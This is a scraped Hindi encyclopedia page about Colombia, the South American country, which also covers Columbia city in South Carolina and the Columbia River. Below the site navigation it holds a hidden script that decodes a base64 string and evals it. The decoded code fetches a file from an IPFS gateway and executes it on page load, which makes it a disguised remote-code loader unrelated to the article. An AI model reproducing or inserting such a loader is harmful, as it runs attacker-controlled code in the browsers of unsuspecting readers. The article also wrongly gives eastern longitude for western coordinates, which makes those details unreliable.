कोलंबिया

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

लेख सूचना
कोलंबिया
पुस्तक नाम हिन्दी विश्वकोश खण्ड 3
पृष्ठ संख्या 174
भाषा हिन्दी देवनागरी
संपादक सुधाकर पांडेय
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1976 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक कैलाश नाथ सिंह

कोलंबिया दक्षिण अमरीका के उत्तरपश्चिमी भाग में वेनीज्वीला (Venezuela) और ब्राजिल के पश्चिम स्थित एक राज्य। इसकी अधिकतम लंबाई 1,170 मील, अधिकतम चौड़ाई 834 मील, क्षेत्रफल 4,39,997 वर्गमील है। ऐंडीज़ पर्वत की तीन श्रेणियां कार्डिलैर आक्सीडेंटल, कार्डिलैर सेंट्रल ओर कार्डिलैर ओरिएंटल समांतर उत्तर दक्षिण दिशा में फैली हुई है। यहाँ की प्रमुख नदी मैगडालिना 1,000 मील लंबी है और पश्चिमी तथा मध्यवर्ती श्रेणियों के बीच उत्तर की ओर बहती है। खनिज संपत्ति की दृष्टि से यह राज्य धनी है। देश का 2/5 भाग पर्वतीय है जिसे हाईलैंड हर्ट और ह्वाइट मैंस कोलंबिया कहा जाता है। 98 % जनसंख्या इसी भाग में रहती है। पेट्रोल मुख्य निर्यातवस्तु है। सोना, चाँदी, ताँबा, शीशा, कोयला आदि अन्य खनिज हैं।

देश की संपत्ति जंगल है। इस राज्य में कुल कृषियोग्य भूमि 60,00,000 एकड़, चराई योग्य भूमि, 9,60,00,000 एकड़ तथा जंगल 14,80,00,000 एकड़ में है। देश की 74 % जनसंख्या कृषि और चराई में लगी है। अच्छी काफी (कहवा) की पैदावार अधिक होती। 90 % पैदावार संयुक्त राज्य को भेजी जाती है। कपास, धान और ईख की भी कृषि काफी होती है।

पूर्वी बृहत्‌ मैदान के कारण, जो देश के आधे से अधिक भाग में फैला हुआ है। यहां मलेरिया का प्रकोप अधिक रहता है। पूर्वी अमेज़न के मैदान में केवल 12 % जनसंख्या रहती है जबकि क्षेत्रफल 2,70,000 वर्गमील है। दलदली भूमि के कारण आवागमन के साधनों की कमी है। मैगडालीना नदी 900 मील तक नौगम्य है । रेलमार्ग 2,000 मील एवं राजमार्ग 12,000 मील लंबा है। बोगोटा यहाँ की राजधानी है प्रसिद्ध नगर है।

संयुक्त राज्य अमरीका का एक नगर जो कंगारी नदी पर स्थित है।[१] यह दक्षिणी कैरोलिना की राजधानी है। 1786 ई. में यह नियोजित नगर बनाया गया। रेलमार्गों ओर राजमार्गो का केंद्र होने के कारण यह प्रमुख वितरणकेंद्र बन गया। सूती वस्त्र बनाना, लकड़ी चीरना, पत्थर तोड़ना और पशुपालन यहां के प्रमुख उद्योग हैं। उत्तरी अमरीका की प्रशांत महासागर में गिरनेवाली द्वितीय बड़ी नदी। यह ब्रिटिश कोलंबिया में 50 डिग्री उत्तरी अक्षांश तथा 116 डिग्री पूर्वी देशांत से निकलकर उत्तरपश्चिम में सेलकर्क पर्वत को घेरती हुई दक्षिण मुड़कर संयुक्त राज्य के वाशिंगटन और ओरेगन राज्यों की सीमा बनानी हुई प्रशांत महासागर में गिरती है। इसकी लंबाई 1,270 मील तथा प्रवाह क्षेत्र 2,50,000 वर्गमील है। शुष्क प्रदेश में बहने के कारण इसका महत्व बढ़ गया है। इसमें कई बांध बाँधकर सिंचाई और विद्युत्पादन में इसका उपयोग किया गया है। ग्रैंड कुली डैम, वोनविल्ले डैम, राक आइलैंड डैम इत्यादि इसके प्रसिद्ध बाँध हैं।

टीका टिप्पणी और संदर्भ

  1. स्थिति 34 डिग्री0 उत्तरी अक्षांश से 80 डिग्री 59 पूर्वी देशांत